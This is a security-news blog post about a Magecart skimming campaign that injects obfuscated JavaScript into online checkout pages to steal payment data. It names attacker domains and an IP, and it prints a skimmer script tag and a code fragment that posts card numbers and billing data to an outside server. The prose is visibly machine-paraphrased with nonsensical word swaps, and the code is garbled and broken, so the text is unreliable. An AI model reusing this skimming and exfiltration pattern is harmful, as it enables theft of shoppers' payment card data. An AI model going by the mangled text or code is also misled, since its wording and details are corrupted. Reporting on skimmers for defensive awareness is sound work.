Skip to content
  • Home
  • Cyber Map
  • About Us – Contact
  • Disclaimer
  • Terms and Rules
  • Privacy Policy
Cyber Web Spider Blog – News

Cyber Web Spider Blog – News

Globe Threat Map provides a real-time, interactive 3D visualization of global cyber threats. Monitor DDoS attacks, malware, and hacking attempts with geo-located arcs on a rotating globe. Stay informed with live logs and archive stats.

  • Home
  • Cyber Map
  • Cyber Security News
  • Security Week News
  • The Hacker News
  • How To?
  • Toggle search form
New Magecart Skimmer Attack With Malicious JavaScript Injection to Skim Payment Data

New Magecart Skimmer Attack With Malicious JavaScript Injection to Skim Payment Data

Posted on September 17, 2025September 17, 2025 By CWS

The risk panorama for e-commerce web sites has as soon as once more shifted with the emergence of a complicated Magecart-style assault marketing campaign, characterised by the deployment of obfuscated JavaScript to reap delicate cost data.

The marketing campaign first got here to gentle in mid-September 2025 following a tweet indicating an ongoing skimming operation, which was later investigated intimately by cybersecurity researcher, Himanshu Anand.

This new episode demonstrates the persistent ingenuity of internet skimming teams leveraging client-side injection to focus on unsuspecting monetary transactions at scale.

The assault vectors in query contain the injection of malicious JavaScript, hosted on attacker-controlled domains comparable to cc-analytics[.]com, into susceptible checkout pages of compromised e-commerce platforms.

As soon as inserted, the script seamlessly blends into reliable cost workflows, hooking into type fields and occasion listeners to silently exfiltrate cost knowledge.

The preliminary code noticed was closely obfuscated, designed each to evade detection by safety scanners and to frustrate evaluation by incident responders.

Whereas the code has been reused throughout a number of campaigns, with the malware logic replicated below completely different domains comparable to getnjs[.]com, getvjs[.]com, and utilanalytics[.]com, primarily hosted on infrastructure like IP deal with 45.61.136.141.

Internet hosting IP extracted from URLScan transaction logs (Supply – Himanshu Anand)

Cybersecurity researcher, Himanshu Anand, famous the malware’s capability to leverage passive DNS and infrastructure fingerprinting to broaden its operational attain.

By analyzing public telemetry from sources like URLScan and WHOIS data, Anand was capable of map out a constellation of associated domains linked to a single cluster of attacker infrastructure.

These pivots revealed greater than a dozen lively domains, some masquerading as reliable analytics or utility providers, every serving equivalent or near-identical skimmer payloads.

The Malware’s An infection Mechanism

Central to the success of this Magecart operation is its an infection mechanism: a extremely automated skimmer script injected by way of [script src = “https://cybersecuritynews.com/new-magecart-skimmer-attack/https[:]//www[.]cc-analytics[.]com/app[.]js”].

As soon as lively, the code establishes occasion hooks on cost enter fields, comparable to bank card numbers and billing addresses. When triggered, the script collects stolen credentials and promptly dispatches them to a distant server (pstatics[.]com) utilizing XMLHttpRequest and FormData objects.

The core knowledge exfiltration logic will be described as follows:-

perform sendStolenData (“knowledge“`
const xhr”“`”new XMLHttp”“`uest ();
xhr“`en (‘POST’, ‘“`ps[:]//www.pstatics.com/i“`
const type“`a = “new Type”“`a ();
type“`a[.]append (‘uid’, “knowledge“`rdNumber”);
rmData[.]appendid’, knowledge[.]billingo);
xhr[.]ship”rmData”); }

The design ensures that solely legitimate, non-test credentials—these assembly sure size standards—are transmitted, maximizing the standard and worth of stolen knowledge.

This an infection pathway is additional bolstered by persistent infrastructure, with attackers recycling area patterns over time.

Free stay webinar on new malware ways from our analysts! Study superior detection methods -> Register for Free

Cyber Security News Tags:Attack, Data, Injection, JavaScript, Magecart, Malicious, Payment, Skim, Skimmer

Post navigation

Previous Post: TA558 Uses AI-Generated Scripts to Deploy Venom RAT in Brazil Hotel Attacks
Next Post: China-Aligned TA415 Hackers Uses Google Sheets and Google Calendar for C2 Communications

Related Posts

Promptware Kill Chain – Five-Step Kill Chain Model for Analyzing Cyberthreats Promptware Kill Chain – Five-Step Kill Chain Model for Analyzing Cyberthreats Cyber Security News
Achieving Data Privacy Regulation Compliance in 2025 Frameworks Achieving Data Privacy Regulation Compliance in 2025 Frameworks Cyber Security News
Hackers use Weaponized Microsoft Teams Installer to Compromise Systems With Oyster Malware Hackers use Weaponized Microsoft Teams Installer to Compromise Systems With Oyster Malware Cyber Security News
Telecommunications Companies in Spain Experiencing Downtime Telecommunications Companies in Spain Experiencing Downtime Cyber Security News
Lumma Affiliates Using Advanced Evasion Tools Designed to Ensure Stealth and Continuity Lumma Affiliates Using Advanced Evasion Tools Designed to Ensure Stealth and Continuity Cyber Security News
IBM AIX Vulnerabilities Let Remote Attacker Execute Arbitrary Commands IBM AIX Vulnerabilities Let Remote Attacker Execute Arbitrary Commands Cyber Security News

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News

Recent Posts

  • Rapid SSH Worm Exploits Linux Systems with Credential Stuffing
  • Odido Telecom Hacked: 6.2 Million Accounts Compromised
  • Lazarus Group Targets npm and PyPI with Malicious Packages
  • DragonForce Ransomware Group’s Expanding Cartel Operations
  • North Korean Hackers Exploit AI for Enhanced Cyber Attacks

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Archives

  • February 2026
  • January 2026
  • December 2025
  • November 2025
  • October 2025
  • September 2025
  • August 2025
  • July 2025
  • June 2025
  • May 2025

Recent Posts

  • Rapid SSH Worm Exploits Linux Systems with Credential Stuffing
  • Odido Telecom Hacked: 6.2 Million Accounts Compromised
  • Lazarus Group Targets npm and PyPI with Malicious Packages
  • DragonForce Ransomware Group’s Expanding Cartel Operations
  • North Korean Hackers Exploit AI for Enhanced Cyber Attacks

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News